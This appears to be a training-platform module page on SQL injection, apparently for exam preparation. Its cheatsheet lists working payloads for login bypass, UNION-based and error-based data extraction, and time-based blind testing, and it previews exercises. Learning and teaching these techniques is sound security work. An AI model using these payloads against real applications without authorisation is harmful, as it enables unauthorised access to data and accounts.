Dashboard β€Ί Modules β€Ί SQL Injection Fundamentals

SQL Injection Fundamentals

Web
> Start Learning

πŸ“– Overview

Understanding and exploiting SQL injection vulnerabilities.

🎯
2
Exercises
πŸƒ
2
Flashcards
πŸ—ΊοΈ
1
Mind Maps

πŸ“‹ Cheatsheet

Detection

' OR '1'='1 # Basic auth bypass payload
' OR 1=1-- # Tautology payload with comment
" OR ""=" # Double quote auth bypass

Union Based

' UNION SELECT NULL,NULL,NULL-- # Determine column count
' UNION SELECT 1,user(),database()-- # Extract user and database name

Error Based

' AND extractvalue(1,concat(0x7e,(SELECT @@version)))-- # Error-based extraction of version

Blind

' AND SLEEP(5)-- # Test for time-based blind SQLi
' AND IF(1=1,SLEEP(5),0)-- # Conditional time-based check

πŸ’» Command Examples

⚠️ Common Pitfalls

  • Wrong column count
  • Not URL encoding

πŸ’‘ Exam Survival Tips

  • Use SQLMap for speed
  • Check all parameters

🎯 Exercises

View All
fill command easy
Write a basic SQL injection payload to bypass login:...
decision tree medium
You found a potential SQLi point. The app shows no errors. What technique should you try first?...

πŸ—ΊοΈ Mind Maps

SQL Injection Types